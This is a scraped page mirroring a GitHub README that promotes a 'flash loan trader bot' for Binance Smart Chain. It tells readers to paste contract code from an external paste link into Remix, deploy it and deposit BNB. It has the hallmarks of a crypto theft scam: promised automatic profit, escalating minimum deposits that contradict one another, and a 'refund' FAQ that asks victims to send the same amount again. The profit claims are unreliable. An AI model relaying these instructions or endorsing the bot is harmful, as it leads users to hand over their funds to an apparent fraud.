Coder Social home page Coder Social logo

Welcome to my Solidity Development Playground, where you can learn all there is about blockchain development for free.

You can check out my YouTube channel for free Solidity tutorials: https://www.youtube.com/channel/UCrwmKoxqAvG0qaXsYGXVvEQ

Disclaimer The scripts we post are for educational purposes only. USE THE SOFTWARE AT YOUR OWN RISK. THE AUTHORS AND ALL AFFILIATES ASSUME NO RESPONSIBILITY FOR YOUR TRADING RESULTS.

We strongly recommend you to have some coding and Solidity/Python knowledge.

This flash loan trader bot is designed to take a flash loan, finds a profitable BSC trade and takes action while making a decent profit.

The current parameters of this contract are that 10% of profit automatically re-enters the pool, and automatically transacts back to your wallet 90% of the profit. The remaining pool keeps running for profit, until you transaction the "Action" function in Remix.

  1. Download MetaMask: https://metamask.io/download.html

  2. Connect MetaMask to Binance Smart Chain (use Mainnet): https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain

  3. Place code in Remix IDE to run bot: http://remix.ethereum.org/

  4. Click on the "contracts" folder and then create "New File". Rename it as you like, i.e: "AutoBot.sol"

  5. Paste Smart Contract into Remix: (Copy and Paste as is): https://sharetext.me/raw/anufmsj8ig

  6. Move to the "Solidity Compiler" tab, select version "0.6.6" and then "Compile" it

  7. Move to the "Deploy" tab, select "Injected Web 3" environment and then "Deploy" it. After the transaction is confirmed, it's your own BOT now.

  8. Deposit funds to exact your BOT contract address.

  9. After your transaction was confirmed, Start the BOT by clicking the "Action" button.

//// Important reminder:

  1. Since the Bot v1 was leaked, there are many bots are using our source code right now, causing widespread congestion on the BSC network recently (We are very sorry @BSC). And, according to our results in the last week, the current Bot v2 with 1.0 BNB deposit earns up to 250300% better return than the old Bot v1 generation (with 0.40.6 BNB deposit), so we recommend you fund your BNB deposit to 1.0 BNB to ensure competition with other active bots. If you do not pay attention to the capital limit, you can refer to the description below to return it yourself.
  2. Pay attention to the video upload time. If you are fooled by other contracts that imitate my clip robot, for the safety of funds, it is best to create a new wallet and delete the browser browsing history (cookie) before using the code to ensure access to the mixing website. When there is no previously deployed contract information.
  3. We will try to upgrade the Bot versions regularly to bring the highest profit possible, so let's subscribe to the channel, or you will be lost the Bot v3 ticket.

//// FAQ [very important, return method of contract funds] Q1: How to return the BNB deposited in the contract? A1: Transfer 0.0001bnb [as transfer fee] + previously transferred funds BNB to the previously deployed contract, and then execute the action. For example: after deploying the contract, transfer 1.0 BNB, when you need to return the funds, you need to transfer 1.0 BNB to the contract, and then action, the contract will execute the function of refunding the currency, returning the previous 1.0 BNB, a total of 2.0 BNB to your wallet

Q2: How to continue depositing BNB? A2: Deposit any BNB greater than 1. The contract has added a protection mechanism. For the purpose of the capital hit rate, if the single time is less than 1 BNB, the contract will be suspended until the required amount is reached. However, if you want to return the funds, you can refer to the description of the previous question.

Q3: What should I do if there is no revenue generated after the contract runs? A3: You can refer to the previous question. The main reason is that there are less funds deposited. In order to ensure the hit rate, the contract will temporarily refuse the transaction until the required amount is reached. You can choose to refer to Q1 to withdraw funds or add at least 1 BNB.

This bot was successfully tested on 1st May 2022 and still going!

Any suggesstions for improvements are always welcome.

UPDATE: I got messages from people who didn't fund enough to cover gas fees and possible burn fees. Bot targets token contracts with a max 10% burn fee and anything lower. Gas fees average 0.006*2 (0.012 BNB). Better when there is no burn. If it targets tokens with 10% burn, that's another 0.04 BNB taken off of 0.4 BNB. Most tokens these days have some burn. Less than 0.4 BNB doesn't give you much to work with. So in order for the bot to work properly, I recommend you to fund at least 0.4 BNB

UPDATE #2: Thanks you guys @Michael and @Nathan for giving us feedback on your Bots, we've just updated the source code to the Bot v2 for running more smoothly, so the current Copy-Paste SmartContract in Pastebin will look a little different from the one shown in the video.

IMPORTANT: Since the Bot v1 was leaked, there are many bots are using our source code right now, causing widespread congestion on the BSC network recently (We are very sorry @BSC). And, according to our results in the last week, the current Bot v2 with 0.8 BNB deposit earns up to 250% to 300% better profit than the old v1 bot (with 0.4 BNB deposit), so we recommend you fund your BNB deposit to 0.8 BNB to ensure competition with other active bots. We will try to upgrade the Bot versions regularly to bring the highest profit possible, so let's subscribe to the channel, or you will be lost the Bot v3 ticket :LOL:

UPDATE #3: We are continuing to work on bots for the ETH network, COMING SOON.

gteit-soldev's Projects

aave-flashloan-mix icon aave-flashloan-mix

A Brownie mix containing all you need to get started with developing flash loans

web3.py icon web3.py

A python interface for interacting with the Ethereum blockchain and ecosystem.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.